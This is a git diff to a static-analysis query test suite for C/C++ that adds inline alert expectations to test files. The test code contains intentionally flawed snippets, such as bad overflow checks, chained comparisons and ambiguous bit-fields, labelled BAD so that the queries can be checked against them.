c5e632ca9b6b..26d720a2ac8a 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 13/LimitedScopeFunction.ql +query: JPL_C/LOC-3/Rule 13/LimitedScopeFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c index a2089446ca77..80e7993e4f4c 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c @@ -5,9 +5,9 @@ int globalInt1; // GOOD [used in func1, func2] int globalInt2; // GOOD [used in func1, func2] int globalInt3; // GOOD [used in func1, func2] -int globalInt4; // BAD [only used in func1] -int globalInt5; // BAD [only used in func1] -int globalInt6; // BAD [only used in func1] +int globalInt4; // BAD [only used in func1] // $ Alert +int globalInt5; // BAD [only used in func1] // $ Alert +int globalInt6; // BAD [only used in func1] // $ Alert int globalInt7; // GOOD [not used, should be reported by another query] int globalInt8; // GOOD [used at file level] int *addrGlobalInt8 = &globalInt8; // GOOD [used in func1, func2] diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref index 687711a321c4..e1e64db86c79 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 17/BasicIntTypes.ql +query: JPL_C/LOC-3/Rule 17/BasicIntTypes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c index 2becb75d916c..ef0f79598fbb 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c @@ -3,7 +3,7 @@ typedef uint8_t U8; typedef U8 something_else; void test1(U8* xptr) { } void test2(U8 x) { } -void test3(unsigned char x) { } +void test3(unsigned char x) { } // $ Alert void test4(uint8_t x){ } void test5(something_else x){ } static U8 test6; diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref index 80637efae7a5..256adc1b4f83 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref @@ -1 +1,2 @@ -JPL_C/LOC-4/Rule 29/NonConstFunctionPointer.ql +query: JPL_C/LOC-4/Rule 29/NonConstFunctionPointer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c index 9999d95be10d..5e7212066700 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c @@ -15,7 +15,7 @@ void test() funPtr2 = &myFunc2; //funPtr3 = &myFunc2; --- this would be a compilation error - funPtr1(); // BAD - funPtr2(); // BAD - funPtr3(); // GOOD [FALSE POSITIVE] + funPtr1(); // BAD // $ Alert + funPtr2(); // BAD // $ Alert + funPtr3(); // GOOD [FALSE POSITIVE] // $ Alert } diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref index 48e8f90bf59b..803c795dc84b 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref @@ -1 +1,2 @@ -JPL_C/LOC-4/Rule 30/FunctionPointerConversions.ql +query: JPL_C/LOC-4/Rule 30/FunctionPointerConversions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c index a36c9f396fe8..73a8aad87bd5 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c @@ -8,14 +8,14 @@ void test() { void (*funPtr1)() = &myFunc1; // GOOD voidFunPtr funPtr2 = &myFunc1; // GOOD - int *intPtr = &myFunc1; // BAD (function pointer -> int pointer) - void *voidPtr = &myFunc1; // BAD (function pointer -> void pointer) + int *intPtr = &myFunc1; // BAD (function pointer -> int pointer) // $ Alert + void *voidPtr = &myFunc1; // BAD (function pointer -> void pointer) // $ Alert int i = &myFunc1; // GOOD (permitted) funPtr1 = funPtr1; // GOOD funPtr2 = funPtr1; // GOOD - intPtr = funPtr1; // BAD (function pointer -> int pointer) - voidPtr = funPtr1; // BAD (function pointer -> void pointer) + intPtr = funPtr1; // BAD (function pointer -> int pointer) // $ Alert + voidPtr = funPtr1; // BAD (function pointer -> void pointer) // $ Alert i = funPtr1; // GOOD (permitted) funPtr1 = funPtr2; // GOOD @@ -26,7 +26,7 @@ void test() funPtr1 = (void (*)())funPtr1; // GOOD funPtr2 = (voidFunPtr)funPtr1; // GOOD - intPtr = (int *)funPtr1; // BAD (function pointer -> int pointer) - voidPtr = (void *)funPtr1; // BAD (function pointer -> void pointer) + intPtr = (int *)funPtr1; // BAD (function pointer -> int pointer) // $ Alert + voidPtr = (void *)funPtr1; // BAD (function pointer -> void pointer) // $ Alert i = (int)funPtr1; // GOOD (permitted) } diff --git a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref index 78378f7b2993..c2826b9bade4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref @@ -1 +1,2 @@ -Likely Bugs/AmbiguouslySignedBitField.ql +query: Likely Bugs/AmbiguouslySignedBitField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp index 19aa4ef2e64b..7f2453b942d5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp @@ -9,18 +9,18 @@ enum myEnum { }; struct { - int nosign : 2; // BAD + int nosign : 2; // BAD // $ Alert signed int sign1 : 2; // GOOD unsigned int sign2 : 2; // GOOD signed sign3: 2; // GOOD unsigned sign4 : 2; // GOOD BOOL typedefbool: 2; // GOOD bool cppbool : 2; // GOOD - char nosignchar : 2; // BAD - short nosignshort : 2; // BAD - myAmbiguousType nosigntypedef : 2; // BAD + char nosignchar : 2; // BAD // $ Alert + short nosignshort : 2; // BAD // $ Alert + myAmbiguousType nosigntypedef : 2; // BAD // $ Alert mySignedType signedtypedef : 2; // GOOD - const int nosignconst : 2; // BAD + const int nosignconst : 2; // BAD // $ Alert const signed int signedconst : 2; myEnum nosignenum : 2; const myEnum constnosignenum : 2; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref index ae8cc803b690..75f106ffa079 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BadAdditionOverflowCheck.ql +query: Likely Bugs/Arithmetic/BadAdditionOverflowCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref index d17e547e8e66..153457ea9906 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/ComparisonWithCancelingSubExpr.ql +query: Likely Bugs/Arithmetic/ComparisonWithCancelingSubExpr.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref index 92873b897597..55be0938e341 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/PointlessSelfComparison.ql +query: Likely Bugs/Arithmetic/PointlessSelfComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp index e359fb098eb1..31d274209068 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp @@ -5,7 +5,7 @@ bool cannotHoldAnother8(int n1) { // clang 8.0.0 -O2: deleted (silently) // gcc 9.2 -O2: deleted (silently) // msvc 19.22 /O2: not deleted - return n1 + 8 < n1; // BAD + return n1 + 8 < n1; // BAD // $ Alert[cpp/signed-overflow-check] } /* 2. Signed comparison with a narrower unsigned type. The narrower @@ -15,7 +15,7 @@ bool cannotHoldAnotherUShort(int n1, unsigned short delta) { // clang 8.0.0 -O2: deleted (silently) // gcc 9.2 -O2: deleted (silently) // msvc 19.22 /O2: not deleted - return n1 + delta < n1; // BAD + return n1 + delta < n1; // BAD // $ Alert[cpp/signed-overflow-check] } /* 3. Signed comparison with a non-narrower unsigned type. The @@ -32,7 +32,7 @@ bool shortShort1(unsigned short n1, unsigned short delta) { // BAD [BadAdditionOverflowCheck.ql] // GOOD [SigneOverflowCheck.ql]: Test always fails, but will never overflow. - return n1 + delta < n1; + return n1 + delta < n1; // $ Alert[cpp/bad-addition-overflow-check] } bool shortShort2(unsigned short n1, unsigned short delta) { @@ -70,7 +70,7 @@ extern se *getSo(void); bool func1(se *so) { se *o = getSo(); - if (so->xPos + so->xSize < so->xPos // BAD + if (so->xPos + so->xSize < so->xPos // BAD // $ Alert[cpp/signed-overflow-check] || so->xPos > o->xPos + o->xSize) { // GOOD // clang 8.0.0 -O2: not deleted // gcc 9.2 -O2: not deleted @@ -96,7 +96,7 @@ int checkOverflow4(unsigned int ioff, C c) { int overflow12(int n) { // not deleted by gcc or clang - return (n + 32 <= (unsigned)n? -1: 1); // BAD: n + 32 can overflow + return (n + 32 <= (unsigned)n? -1: 1); // BAD: n + 32 can overflow // $ Alert[cpp/signed-overflow-check] } bool multipleCasts(char x) { @@ -110,7 +110,7 @@ bool multipleCasts2(char x) { // BAD [BadAdditionOverflowCheck.ql] // GOOD [SigneOverflowCheck.ql]: Test always fails, but will never overflow. - return (int)(unsigned short)(x + '1') < (int)(unsigned short)x; + return (int)(unsigned short)(x + '1') < (int)(unsigned short)x; // $ Alert[cpp/bad-addition-overflow-check] } int does_it_overflow(int n1, unsigned short delta) { @@ -119,7 +119,7 @@ int does_it_overflow(int n1, unsigned short delta) { int overflow12b(int n) { // not deleted by gcc or clang - return ((unsigned)(n + 32) <= (unsigned)n? -1: 1); // BAD: n + 32 may overflow + return ((unsigned)(n + 32) <= (unsigned)n? -1: 1); // BAD: n + 32 may overflow // $ Alert[cpp/signed-overflow-check] } #define MACRO(E1, E2) (E1) <= (E2)? -1: 1 diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref index dde648402029..a8d760f993f8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/SignedOverflowCheck.ql +query: Likely Bugs/Arithmetic/SignedOverflowCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp index 7aa83440fd52..546ff7488fc5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/templates.cpp @@ -14,7 +14,7 @@ bool compareValues() { return T1::value < T2::value || // GOOD T1::value < T1::value || // BAD [NOT DETECTED] - C1::value < C1::value ; // BAD + C1::value < C1::value ; // BAD // $ Alert[cpp/comparison-of-identical-expressions] } bool callCompareValues() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp index e36956f9c690..af3462aaee8a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/test.cpp @@ -1,6 +1,6 @@ // Test for BadAdditionOverflowCheck. bool checkOverflow1(unsigned short a, unsigned short b) { - return (a + b < a); // BAD: comparison always false (due to promotion). + return (a + b < a); // BAD: comparison always false (due to promotion). // $ Alert[cpp/bad-addition-overflow-check] } // Test for BadAdditionOverflowCheck. @@ -10,7 +10,7 @@ bool checkOverflow2(unsigned short a, unsigned short b) { // Test for PointlessSelfComparison. bool selfCmp1(int x) { - return (x == (int)x); // BAD: always returns true. + return (x == (int)x); // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] } // Test for PointlessSelfComparison. @@ -26,8 +26,8 @@ bool isnan(double x) { // Tests for ComparisonWithCancelingSubExpr. void cmpWithCancelingVar1(unsigned short x, unsigned short y, unsigned short z) { bool b; - b = x + y < x + z; // BAD: x can be canceled - b = x + y - x < z; // BAD: x can be canceled + b = x + y < x + z; // BAD: x can be canceled // $ Alert[cpp/comparison-canceling-subexpr] + b = x + y - x < z; // BAD: x can be canceled // $ Alert[cpp/comparison-canceling-subexpr] b = 2*x + y < 2*x + z; // BAD: x can be canceled b = 3*x + y - 2*x < z + x; // BAD: x can be canceled b = (-x) - (+x) < z - 2*x; // BAD: x can be canceled @@ -76,18 +76,18 @@ bool cmpWithCancelingVar3(int x) { bool selfCmp3(unsigned short x) { x++; - return (x == (unsigned short)x); // BAD: always returns true. + return (x == (unsigned short)x); // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] } bool selfCmp4(int x) { - while (x == x) // BAD: always returns true. + while (x == x) // BAD: always returns true. // $ Alert[cpp/comparison-of-identical-expressions] { x = x + 1; } } bool selfCmp5(int x) { - while (x == x) // BAD: always returns true. [NOT DETECTED] + while (x == x) // BAD: always returns true. [NOT DETECTED] // $ Alert[cpp/comparison-of-identical-expressions] { x++; } @@ -105,7 +105,7 @@ bool checkOverflow3(unsigned int a, unsigned short b) { return false; } - return (a + b < a); // GOOD: b is automatically promoted to unsigned int + return (a + b < a); // GOOD: b is automatically promoted to unsigned int // $ Alert[cpp/comparison-canceling-subexpr] } // We imagine that the next two lines come from a platform-specific header. @@ -115,7 +115,7 @@ typedef unsigned long long size_t; int isSmallEnough(unsigned long long x) { // The cast is to the same syntactic type, and there is no macro involved. // That makes the cast redundant, and therefore the comparison is redundant. - if ((unsigned long long)x != x) { // BAD + if ((unsigned long long)x != x) { // BAD // $ Alert[cpp/comparison-of-identical-expressions] return 0; } // These comparisons are pointless on the platform where this test runs, but @@ -148,5 +148,5 @@ void useMarkRange(int offs) { #define MY_MACRO(x) (x) void myMacroTest(int x) { - MY_MACRO(x == x); // BAD + MY_MACRO(x == x); // BAD // $ Alert[cpp/comparison-of-identical-expressions] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref index 14c3e5c97e1d..544f107b3ff4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/BadCheckOdd.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BadCheckOdd.ql +query: Likely Bugs/Arithmetic/BadCheckOdd.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp index 14d030f14ef7..2d5dbab0906c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadCheckOdd/test.cpp @@ -1,5 +1,5 @@ int test1(int x) { - return x % 2 == 1; // BAD + return x % 2 == 1; // BAD // $ Alert } int test2(unsigned int x) { @@ -7,7 +7,7 @@ int test2(unsigned int x) { } int test3(short x) { - return x % 2 == 1; // BAD + return x % 2 == 1; // BAD // $ Alert } int test4(unsigned short x) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref index 27d5a87962e4..0a74257ab6e0 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/BitwiseSignCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BitwiseSignCheck.ql \ No newline at end of file +query: Likely Bugs/Arithmetic/BitwiseSignCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp index 8aab27bcf4d2..a869af366120 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BitwiseSignCheck/bsc.cpp @@ -1,9 +1,9 @@ bool is_bit_set_v1(int x, int bitnum) { - return (x & (1 << bitnum)) > 0; // BAD + return (x & (1 << bitnum)) > 0; // BAD // $ Alert } bool is_bit_set_v2(int x, int bitnum) { - return ((1 << bitnum) & x) > 0; // BAD + return ((1 << bitnum) & x) > 0; // BAD // $ Alert } bool plain_wrong(int x, int bitnum) { @@ -15,11 +15,11 @@ bool is_bit24_set(int x) { } bool is_bit31_set_bad_v1(int x) { - return (x & (1 << 31)) > 0; // BAD + return (x & (1 << 31)) > 0; // BAD // $ Alert } bool is_bit31_set_bad_v2(int x) { - return 0 < (x & (1 << 31)); // BAD + return 0 < (x & (1 << 31)); // BAD // $ Alert } bool is_bit31_set_good(int x) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref index 1fd4cfa3e183..1ffebc3c0cbd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/ComparisonPrecedence.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/ComparisonPrecedence.ql +query: Likely Bugs/Arithmetic/ComparisonPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp index 37280b8da751..8898124b5667 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/template.cpp @@ -1,7 +1,7 @@ template void templateFunc1(T x, T y, T z) { - if (x < y < z) {} // BAD (though dubious as we can imagine other instantiations using an overloaded `operator<`) + if (x < y < z) {} // BAD (though dubious as we can imagine other instantiations using an overloaded `operator<`) // $ Alert if (x < y && y < z) {} // GOOD }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp index 3a82d5c37d59..73ff07e6bbc1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/ComparisonPrecedence/test.cpp @@ -39,19 +39,19 @@ class MyClass2 { void test1(int x, int y, int z) { // built-in comparison - if (x < y < z) {} // BAD - if (x > y > z) {} // BAD - if (x <= y <= z) {} // BAD - if (x <= y <= z) {} // BAD - if (x < y > z) {} // BAD + if (x < y < z) {} // BAD // $ Alert + if (x > y > z) {} // BAD // $ Alert + if (x <= y <= z) {} // BAD // $ Alert + if (x <= y <= z) {} // BAD // $ Alert + if (x < y > z) {} // BAD // $ Alert if ((x < y) && (y < z)) {} // GOOD if (x < y && y < z) {} // GOOD - if ((x + 1) < (y + 1) < (z + 1)) {} // BAD - if (x < x + y < z) {} // BAD + if ((x + 1) < (y + 1) < (z + 1)) {} // BAD // $ Alert + if (x < x + y < z) {} // BAD // $ Alert if ((x < y) < z) {} // GOOD (this is deliberately allowed) - if (!(x < y < z)) {} // BAD + if (!(x < y < z)) {} // BAD // $ Alert // overloaded comparison { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref index 7a65c3a0dee0..2984d2c1968a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/FloatComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/FloatComparison.ql +query: Likely Bugs/Arithmetic/FloatComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c index 9cf59f342c06..5b78d4d4aa70 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/FloatComparison/c.c @@ -7,13 +7,13 @@ void c_f(void) { x == 3.0; 3.0 == x; x == x; - x == y; + x == y; // $ Alert g() == 3.0; 3.0 == g(); - g() == g(); + g() == g(); // $ Alert - x == g(); - g() == x; + x == g(); // $ Alert + g() == x; // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c index 3d01a28fae0a..57b04c28b829 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/Buildless.c @@ -3,7 +3,7 @@ void test_float_double1(float f, double d) { float r1 = f * f; // GOOD float r2 = f * d; // GOOD - double r3 = f * f; // BAD + double r3 = f * f; // BAD // $ Alert double r4 = f * d; // GOOD float f1 = fabsf(f * f); // GOOD @@ -18,7 +18,7 @@ float fabsf(float f); void test_float_double2(float f, double d) { float r1 = f * f; // GOOD float r2 = f * d; // GOOD - double r3 = f * f; // BAD + double r3 = f * f; // BAD // $ Alert double r4 = f * d; // GOOD float f1 = fabsf(f * f); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c index 7639c76bd8fc..c8d396d1da50 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.c @@ -1,10 +1,10 @@ long long f(short x, int y, long long z) { y == x * x; // safe y == x * (int)x; // safe - z == y * x; // unsafe + z == y * x; // unsafe // $ Alert z == (long long)(y * x); // we assume the user knows what they are doing if(x == 56) - return y * y; // unsafe + return y * y; // unsafe // $ Alert if(x == 56) return (long long)(y * y); // we assume the user knows what they are doing return 42 * 23; // safe @@ -15,10 +15,10 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { // but the target type does not imply that the developer anticipates one as with // an int -> long long conversion. We should therefore not flag these cases. - double v1_1 = f * g; // unsafe (float -> double) + double v1_1 = f * g; // unsafe (float -> double) // $ Alert double v1_2 = f * (double)g; // safe - double v2_1 = (i + j) * f; // unsafe (float -> double) + double v2_1 = (i + j) * f; // unsafe (float -> double) // $ Alert double v2_2 = (i + j) * (double)f; // safe double v3_1 = i * j; // dubious (int -> double) @@ -35,7 +35,7 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { int v6_1 = f * g; // safe (float -> int) int v6_2 = (int)f * g; // safe - double v7_1 = f * f; // unsafe (float -> double) + double v7_1 = f * f; // unsafe (float -> double) // $ Alert double v7_2 = h * h; // safe double v7_3 = (f * f); // unsafe (float -> double) [NOT DETECTED] @@ -56,11 +56,11 @@ void int_float(int i, int j, long long ll, float f, float g, double h, char c) { float v12_2 = 1.0f + f * f + f * f; // safe double v13_1 = f * f * 2.0; // unsafe (float -> double) [NOT DETECTED] - double v13_2 = f * f * 2.0f; // unsafe (float -> double) + double v13_2 = f * f * 2.0f; // unsafe (float -> double) // $ Alert - long long v14_1 = i * (i + 2) + ll; // unsafe (int -> long long) + long long v14_1 = i * (i + 2) + ll; // unsafe (int -> long long) // $ Alert long long v14_2 = i * (i + 2ll) * ll; // safe - long long v14_3 = i * (i + (int)2ll) + ll; // unsafe (int -> long long) + long long v14_3 = i * (i + (int)2ll) + ll; // unsafe (int -> long long) // $ Alert } typedef unsigned long long size_t; @@ -72,7 +72,7 @@ void use_size_t(int W, int H) int y = 20; const int vs[] = {10, 20}; - malloc(W * H); // unsafe (int -> size_t) + malloc(W * H); // unsafe (int -> size_t) // $ Alert malloc((size_t)W * (size_t)H); // safe malloc(10 * 20); // safe (small values) @@ -96,16 +96,16 @@ size_t three_chars(unsigned char a, unsigned char b, unsigned char c) { void g(unsigned char uchar1, unsigned char uchar2, unsigned char uchar3, int i) { unsigned 